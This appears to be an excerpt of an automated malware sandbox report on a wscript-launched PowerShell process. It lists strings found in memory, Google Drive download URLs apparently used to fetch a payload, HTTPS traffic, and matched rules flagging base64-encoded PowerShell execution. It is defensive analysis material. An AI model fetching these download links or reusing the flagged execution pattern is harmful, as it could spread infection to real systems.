Source: http://pesterbdd.com/images/Pester.png |
URL Reputation: Label: malware |
Source: |
Binary string: e.pdb source: powershell.exe, 00000002.00000002.1376694378.000001D95C843000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: CallSite.Target.pdb source: powershell.exe, 00000002.00000002.1346871388.000001D942A24000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: n.pdbfYYo source: powershell.exe, 00000002.00000002.1393917309.000001D95C925000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.1376694378.000001D95C8A9000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: mscorlib.pdb source: powershell.exe, 00000002.00000002.1376694378.000001D95C87F000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb_4 source: powershell.exe, 00000002.00000002.1394575729.000001D95CB20000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: t.Automation.pdb source: powershell.exe, 00000002.00000002.1346871388.000001D9429C4000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1394575729.000001D95CB20000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32/ source: powershell.exe, 00000002.00000002.1394575729.000001D95CB8D000.00000004.00000020.00020000.00000000.sdmp |
Source: powershell.exe, 00000002.00000002.1347362979.000001D9466E6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.google.com |
Source: powershell.exe, 00000002.00000002.1347362979.000001D94671F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.usercontent.google.com |
Source: powershell.exe, 00000002.00000002.1370143781.000001D9546A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1370143781.000001D954562000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000002.00000002.1347362979.000001D944719000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000002.00000002.1347362979.000001D9444F1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000002.00000002.1347362979.000001D944719000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000002.00000002.1347362979.000001D9444F1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000002.00000002.1347362979.000001D944A42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A30000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://apis.google.com |
Source: powershell.exe, 00000002.00000002.1370143781.000001D954562000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000002.00000002.1370143781.000001D954562000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000002.00000002.1370143781.000001D954562000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000002.00000002.1347362979.000001D94652E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.googP |
Source: powershell.exe, 00000002.00000002.1347362979.000001D94652E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944719000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com |
Source: powershell.exe, 00000002.00000002.1347362979.000001D944719000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1p8CA5IWVRgggeGBH5Jt5SA7bzDiwA7DeP |
Source: powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.googh |
Source: powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com |
Source: powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A30000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/download?id=1p8CA5IWVRgggeGBH5Jt5SA7bzDiwA7De&export=download |
Source: powershell.exe, 00000002.00000002.1347362979.000001D944A30000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.comX1 |
Source: powershell.exe, 00000002.00000002.1347362979.000001D944719000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000002.00000002.1347362979.000001D94587B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000002.00000002.1370143781.000001D9546A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1370143781.000001D954562000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000002.00000002.1347362979.000001D944A42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A30000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ssl.gstatic.com |
Source: powershell.exe, 00000002.00000002.1347362979.000001D944A2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D946708000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A30000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google-analytics.com;report-uri |
Source: powershell.exe, 00000002.00000002.1347362979.000001D944A42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A30000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com |
Source: powershell.exe, 00000002.00000002.1347362979.000001D944A42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A30000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.googletagmanager.com |
Source: powershell.exe, 00000002.00000002.1347362979.000001D944A2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D946708000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A30000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.gstatic.com |
Source: unknown |
Network traffic detected: HTTP traffic on port 49706 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49705 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49706 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49705 |
Source: amsi64_7420.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7420, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" |